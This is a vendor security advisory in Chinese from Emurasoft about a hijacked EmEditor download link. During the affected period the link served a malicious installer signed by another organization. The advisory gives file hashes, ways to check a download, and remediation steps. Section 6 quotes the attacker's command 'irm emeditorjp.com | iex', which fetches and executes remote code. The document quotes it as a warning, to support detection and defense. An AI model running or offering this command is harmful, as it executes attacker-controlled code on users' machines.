【重要】關於 EmEditor 安裝程式下載連結的安全事件通知

/在: /通過:

感謝您使用 EmEditor。

我們非常遺憾地通知您:我們已確認 EmEditor 官方網站的下載路徑([Download Now] 按鈕)發生了一起事件,疑似遭到第三方未授權篡改。在受影響期間,通過該按鈕下載的安裝程式可能並非我們(Emurasoft, Inc.)提供的正版檔案。

對此可能造成的擔憂與不便,我們深表歉意。請閱讀以下信息。

1. 可能受影響的期間

  • 2025 年 12 月 19 日 18:39 – 2025 年 12 月 22 日 12:50(美國太平洋時間)

如果您在上述期間通過 EmEditor 首頁的 [Download Now] 按鈕下載安裝程式,則有可能下載到了一個沒有我們數位簽章的不同檔案。這是保守估計;實際受影響時間可能更短,並且可能僅限於某一特定時間段。

2. 事件概要(深層原因)

[Download Now] 按鈕正常情況下指向以下 URL:

  • https://support.emeditor.com/en/downloads/latest/installer/64

該 URL 使用了重定向。然而在受影響期間,重定向設定疑似被第三方變更,導致下載被從以下(錯誤)URL 提供:

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

該檔案並非由 Emurasoft, Inc. 建立,並且已被移除

因此我們確認,下載到的檔案數位簽章可能不是我們,而是來自另一家名為 WALSHAM INVESTMENTS LIMITED 的組織。

註:此問題可能不限於英文頁面,也可能影響其他語言的類似 URL(包括日文)。

3. 已確認可能受影響的檔案

目前唯一確認涉及的檔案為:

  • emed64_25.4.3.msi

正版檔案(官方)

  • 檔案名:emed64_25.4.3.msi
  • 大小:80,376,832 位元組
  • 數位簽章:Emurasoft, Inc.
  • SHA-256:e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

可疑檔案(可能被篡改)

  • 檔案名:emed64_25.4.3.msi
  • 大小:80,380,416 位元組
  • 數位簽章:WALSHAM INVESTMENTS LIMITED

4. 不受影響的情況

如果符合以下任一情況,則您不受影響

  • 通過 EmEditor 的 更新檢查器(Update Checker) 或自動更新進行更新
  • 直接從 download.emeditor.info 下載
    範例:https://download.emeditor.info/emed64_25.4.3.msi
  • 下載的不是 emed64_25.4.3.msi 檔案
  • 使用了 可攜式版(portable version)
  • 使用了 市集應用版本(store app version)
  • 使用 winget 安裝/更新
  • 下載了檔案但沒有運行/執行

5. 如何檢查以及應采取的措施

如果您可能在受影響期間通過 [Download Now] 下載了安裝程式,請驗證 emed64_25.4.3.msi 檔案的數位簽章SHA-256 哈希

5-1. 如何檢查數位簽章(Windows)

  1. 右鍵點擊檔案(emed64_25.4.3.msi),選擇 屬性(Properties)
  2. 打開 數位簽章(Digital Signatures) 索引標籤。
  3. 確認簽名者為 Emurasoft, Inc.
  • 若顯示 WALSHAM INVESTMENTS LIMITED,則該檔案可能為惡意檔案。

如果未顯示「數位簽章」索引標籤,可能表示該檔案未簽名或簽名無法識別。此時請勿運行該檔案;刪除並按下方指引處理。

5-2. 如何檢查 SHA-256(Windows / PowerShell)

打開 PowerShell 並執行:

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

確認匯出的 SHA-256 與下列一致:

  • 正版 SHA-256:e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

如果簽名或 SHA-256 不符合(建議措施)

如果數位簽章不是 Emurasoft, Inc.(例如為 WALSHAM INVESTMENTS LIMITED)或 SHA-256 不符合,則您可能獲取了被篡改的檔案(可能包含惡意軟體)。

  • 立即將受影響電腦斷開網絡串連(有線/無線)
  • 對系統執行一次完整的惡意軟體掃描
  • 視情況考慮重新整理/重建包括操作系統在內的環境
  • 考慮憑據可能泄露:對該裝置上使用/儲存過的賬號變更密碼(並盡可能啟用 MFA 多因素認證)

如果您在組織內使用 EmEditor,也建議聯繫內部安全團隊(如 CSIRT),並盡可能保留相關日志。

6. 已觀察到的行為(截至目前確認)

該可疑安裝程式在執行時可能嘗試運行以下命令。在任何情況下都不要運行該命令。

  • powershell.exe "irm emeditorjp.com | iex"

該命令會從 emeditorjp.com 下載並執行內容。
emeditorjp.com 並非 Emurasoft, Inc. 管理的域名。

另請註意:該安裝程式可能仍會正常安裝 EmEditor 並安裝正版的 EmEditor 程式檔案,這會使問題更難被察覺。

7. 目前的狀態與後續更新

我們將繼續調查事實並確定影響範圍。一旦有更多信息,我們會在本頁面和/或通過官方渠道盡快更新。
我們高度重視此次事件,並將采取必要措施查明原因、避免再次發生。

對於此次事件可能造成的不便與擔憂,我們再次致以誠摯歉意,並感謝您對 EmEditor 的理解與持續支持。